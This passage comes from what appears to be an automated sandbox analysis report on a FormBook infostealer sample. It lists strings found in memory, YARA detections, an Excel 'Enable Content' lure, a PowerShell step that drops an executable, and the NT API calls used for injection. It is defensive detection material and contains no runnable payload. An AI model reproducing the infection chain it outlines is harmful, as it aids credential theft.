          Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comR
          Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comegu
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: oftmhayq.exe, 00000018.00000003.428462060.0000000005A6B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/O
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: oftmhayq.exe, 00000018.00000003.429554152.0000000005A6B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlj
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG6
          Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma77
          Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comldva
          Source: oftmhayq.exe, 00000018.00000003.419516812.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.419609379.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: oftmhayq.exe, 00000018.00000003.419447690.0000000005A6D000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comat
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: oftmhayq.exe, 00000018.00000003.424365835.0000000005A38000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: oftmhayq.exe, 00000018.00000003.424456304.0000000005A37000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnn-u
          Source: oftmhayq.exe, 00000018.00000003.423993163.0000000005A37000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnp
          Source: oftmhayq.exe, 00000019.00000003.431627701.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.431695720.00000000063CD000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/I7s
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Kurst7D
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/S7
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: oftmhayq.exe, 00000019.00000003.434710127.00000000063F1000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.comc
          Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.como
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deX
          Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deocS
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000014.00000002.438220332.000001D20BD39000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: oftmhayq.exe, 00000018.00000002.467569207.0000000000EBB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 12Screenshot OCR: Enable Content : lj, 5 6 7 " _ _ _="1 - 8 9 10 . . 11 " 12 Microsoft Excel X 13 14 ! Wa
          Powershell drops PE fileShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\oftmhayq.exeJump to dropped file
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419D60 NtCreateFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419E10 NtReadFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419E90 NtClose,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419E8A NtClose,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013195D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319950 NtQueueApcThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013199D0 NtCreateProcessEx,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319820 NtEnumerateKey,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131B040 NtSuspendThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319840 NtDelayExecution,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013198A0 NtWriteVirtualMemory,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013198F0 NtReadVirtualMemory,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319B00 NtSetValueKey,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131A3B0 NtGetContextThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319A20 NtResumeThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319A10 NtQuerySection,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319A00 NtProtectVirtualMemory,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319A50 NtCreateFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319A80 NtOpenDirectoryObject,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131AD30 NtSetContextThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319520 NtWaitForSingleObject,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319560 NtWriteFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319540 NtReadFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013195F0 NtQueryInformationFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319730 NtQueryVirtualMemory,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319710 NtQueryInformationToken,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131A710 NtOpenProcessToken,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131A770 NtOpenThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319770 NtSetInformationFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319760 NtOpenProcess,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013197A0 NtUnmapViewOfSection,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319FE0 NtCreateMutant,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319610 NtEnumerateValueKey,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319670 NtQueryInformationProcess,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319650 NtQueryValueKey,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013196D0 NtCreateKey,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419D60 NtCreateFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419E10 NtReadFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419E90 NtClose,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419E8A NtClose,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013695D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369950 NtQueueApcThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013699D0 NtCreateProcessEx,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369820 NtEnumerateKey,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0136B040 NtSuspendThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013698A0 NtWriteVirtualMemory,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369B00 NtSetValueKey,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0136A3B0 NtGetContextThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369A20 NtResumeThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369A10 NtQuerySection,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369A80 NtOpenDirectoryObject,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0136AD30 NtSetContextThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369520 NtWaitForSingleObject,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369560 NtWriteFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369540 NtReadFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013695F0 NtQueryInformationFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369730 NtQueryVirtualMemory,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0136A710 NtOpenProcessToken,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0136A770 NtOpenThread,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369770 NtSetInformationFile,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369760 NtOpenProcess,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013697A0 NtUnmapViewOfSection,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369FE0 NtCreateMutant,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369610 NtEnumerateValueKey,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369670 NtQueryInformationProcess,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369650 NtQueryValueKey,
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013696D0 NtCreateKey,
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_02A9C134
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_02A9E568
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_02A9E578
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BBD4B8
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BBB368
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BB1290
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BB9F90
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BBC9A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BB1AB8
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BB1AA9
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_071F5D38
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_071F2920
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_071F21B0
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_071F0040
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_071F3630
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730C5B8
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730BCE8
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730E050
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_07302F05
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_073017FA
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_07302A55
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_07300128
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_07300145
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730B9A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_0188C134
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_0188E568
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_0188E578
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_074BED10
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_074B2B58
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_074B2B49
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_074B28F8
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_074B28A8
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07AD5D38
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07AD21B0
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07AD0040
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07AD3630
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07BEC5B8
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07BEBCE8
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07BEE050
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07BEB9A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00401030
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041D96D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041DAB1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041DCBF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00402D88
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00402D90
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00409E40
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00409E3B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041DF98
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041CFA3
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00402FB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F4120
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DF900
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F2990
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EC1C0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013AE824
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA830
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D6800
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D
